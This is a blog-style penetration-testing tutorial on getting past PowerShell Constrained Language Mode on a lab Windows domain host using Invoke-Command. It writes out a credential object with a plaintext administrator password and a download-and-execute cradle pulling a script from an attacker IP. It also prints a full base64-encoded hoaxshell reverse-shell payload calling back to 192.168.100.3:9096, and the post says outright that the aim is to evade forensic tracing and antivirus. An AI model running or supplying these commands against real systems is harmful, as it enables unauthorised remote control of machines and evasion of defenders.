This article to show you how you could bypass CLM with the Invoke-Command. Help us to get a better shell instead of using Invoke-Command
Introduction
Invoke-Command is a powershell command that runs commands on local and remote computers. However, it is based on CMD terminal syntax, if we need to run a powershell command. We need to add some extra statement.
Invoke-Command CLM Mode Example
This is the example of doing an Active Directory Pentest that I need to use Invoke-Command to access other PC.
C:\Windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> $passwd = ConvertTo-SecureString '%U;rO,]1qo7' -AsPlainText -ForcePS C:\Windows\system32> $creds = New-Object System.Management.Automation.PSCredential("test\Administrator", $passwd)
PS C:\Windows\system32> $credsUserName Password
-------- --------
test\Administrator System.Security.SecureString
PS C:\Windows\system32> Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {whoami}
Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {whoami}
lab-info-sys\administrator
PS C:\Windows\system32> Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {cmd /c "powershell.exe iex(new-object net.webclient).downloadstring('http://192.168.100.3:8000/bypass.ps1')"}
Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {cmd /c "powershell.exe iex(new-object net.webclient).downloadstring('http://192.168.100.3:8000/bypass.ps1')"}
PS C:\Windows\system32> new-object : Cannot create type. Only core types are supported in this
language mode.
+ CategoryInfo : NotSpecified: (new-object : Ca... language mode.
:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ PSComputerName : 172.16.200.3
At line:1 char:5
+ iex(new-object net.webclient).downloadstring('http://192.168.100.3:80 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (:) [New-Object],
PSNotSupportedException
+ FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.Pow
erShell.Commands.NewObjectCommand
NotSpecified: ( :String) [], RemoteException
As you could see, we could not get the reverse shell using powershell. The reason of using powershell is to make the payload hard to investigate and find it. If we used an executable file, the defender could use digital forensic to trace us back through the reverse engineering.
A simple way without writing script to bypass the CLM Mode
We could use hoaxshell to do that. In order to do this, first we need to download the hoaxshell.
The syntax should be look like this
python3 hoaxshell.py -s <attacker-ip> -p <attacker-port> -cm
Example
In our machine:
┌──(iwin㉿kali)-[~/hoaxshell]
└─$ python3 hoaxshell.py -s 192.168.100.3 -p 9096 -cm
┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬ ┬
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤ │ │
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
by t3l3machus
[Info] Generating reverse shell payload...
powershell -e JABzAD0AJwAxADkAMgAuADEANgA4AC4AMQAwADAALgAzADoAOQAwADkANgAnADsAJABpAD0AJwAyADUAMgAxAGYAZAA1AGMALQA4AGEAMAAxADUAMwAwADUALQBhADYAZABjADgAMwBkADYAJwA7ACQAcAA9ACcAaAB0AHQAcAA6AC8ALwAnADsAJAB2AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMgA1ADIAMQBmAGQANQBjACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADEAYQAzAGIALQAzADMAYwBhACIAPQAkAGkAfQA7AHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAewAkAGMAPQAoAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvADgAYQAwADEANQAzADAANQAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAxAGEAMwBiAC0AMwAzAGMAYQAiAD0AJABpAH0AKQAuAEMAbwBuAHQAZQBuAHQAOwBpAGYAIAAoACQAYwAgAC0AbgBlACAAJwBOAG8AbgBlACcAKQAgAHsAJAByAD0AaQBlAHgAIAAkAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAEUAcgByAG8AcgBWAGEAcgBpAGEAYgBsAGUAIABlADsAJAByAD0ATwB1AHQALQBTAHQAcgBpAG4AZwAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJAByADsAJAB0AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcAAkAHMALwBhADYAZABjADgAMwBkADYAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAxAGEAMwBiAC0AMwAzAGMAYQAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoACQAZQArACQAcgApAH0AIABzAGwAZQBlAHAAIAAwAC4AOAB9AA==
Copied to clipboard!
In Client Side machine:
PS C:\Windows\system32> Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {cmd /c "powershell -e JABzAD0AJwAxADkAMgAuADEANgA4AC4AMQAwADAALgAzADoAOQAwADkANgAnADsAJABpAD0AJwAyADUAMgAxAGYAZAA1AGMALQA4AGEAMAAxADUAMwAwADUALQBhADYAZABjADgAMwBkADYAJwA7ACQAcAA9ACcAaAB0AHQAcAA6AC8ALwAnADsAJAB2AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMgA1ADIAMQBmAGQANQBjACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADEAYQAzAGIALQAzADMAYwBhACIAPQAkAGkAfQA7AHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAewAkAGMAPQAoAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvADgAYQAwADEANQAzADAANQAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAxAGEAMwBiAC0AMwAzAGMAYQAiAD0AJABpAH0AKQAuAEMAbwBuAHQAZQBuAHQAOwBpAGYAIAAoACQAYwAgAC0AbgBlACAAJwBOAG8AbgBlACcAKQAgAHsAJAByAD0AaQBlAHgAIAAkAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAEUAcgByAG8AcgBWAGEAcgBpAGEAYgBsAGUAIABlADsAJAByAD0ATwB1AHQALQBTAHQAcgBpAG4AZwAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJAByADsAJAB0AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcAAkAHMALwBhADYAZABjADgAMwBkADYAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAxAGEAMwBiAC0AMwAzAGMAYQAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoACQAZQArACQAcgApAH0AIABzAGwAZQBlAHAAIAAwAC4AOAB9AA=="}
In our machine:
┌──(iwin㉿kali)-[~/hoaxshell]
└─$ python3 hoaxshell.py -s 192.168.100.3 -p 9096 -cm
┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬ ┬
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤ │ │
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
by t3l3machus
[Info] Generating reverse shell payload...
powershell -e JABzAD0AJwAxADkAMgAuADEANgA4AC4AMQAwADAALgAzADoAOQAwADkANgAnADsAJABpAD0AJwAyADUAMgAxAGYAZAA1AGMALQA4AGEAMAAxADUAMwAwADUALQBhADYAZABjADgAMwBkADYAJwA7ACQAcAA9ACcAaAB0AHQAcAA6AC8ALwAnADsAJAB2AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMgA1ADIAMQBmAGQANQBjACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADEAYQAzAGIALQAzADMAYwBhACIAPQAkAGkAfQA7AHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAewAkAGMAPQAoAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvADgAYQAwADEANQAzADAANQAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAxAGEAMwBiAC0AMwAzAGMAYQAiAD0AJABpAH0AKQAuAEMAbwBuAHQAZQBuAHQAOwBpAGYAIAAoACQAYwAgAC0AbgBlACAAJwBOAG8AbgBlACcAKQAgAHsAJAByAD0AaQBlAHgAIAAkAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAEUAcgByAG8AcgBWAGEAcgBpAGEAYgBsAGUAIABlADsAJAByAD0ATwB1AHQALQBTAHQAcgBpAG4AZwAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJAByADsAJAB0AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcAAkAHMALwBhADYAZABjADgAMwBkADYAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAxAGEAMwBiAC0AMwAzAGMAYQAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoACQAZQArACQAcgApAH0AIABzAGwAZQBlAHAAIAAwAC4AOAB9AA==
Copied to clipboard!
[Info] Type "help" to get a list of the available prompt commands.
[Info] Http Server started on port 9096.
[Important] Awaiting payload execution to initiate shell session...
[Shell] Payload execution verified!
[Shell] Stabilizing command prompt...
PS C:\Users\Administrator.LAB-INFO-SYS\Documents > whoami;hostname
lab-info-sys\administrator
Lab-Info-Sys
PS C:\Users\Administrator.LAB-INFO-SYS\Documents >
Conclusion
Some of the EDR/ AV might blocked Hoaxshell, and you need to write the payload by yourself. And I am still learning some Windows EDR/AV bypass technique for OSEP, CESC-AS, CRTL. If you are interested to learn more, they are a great course that provided the lab and teach you how to bypass Windows EDR/AV.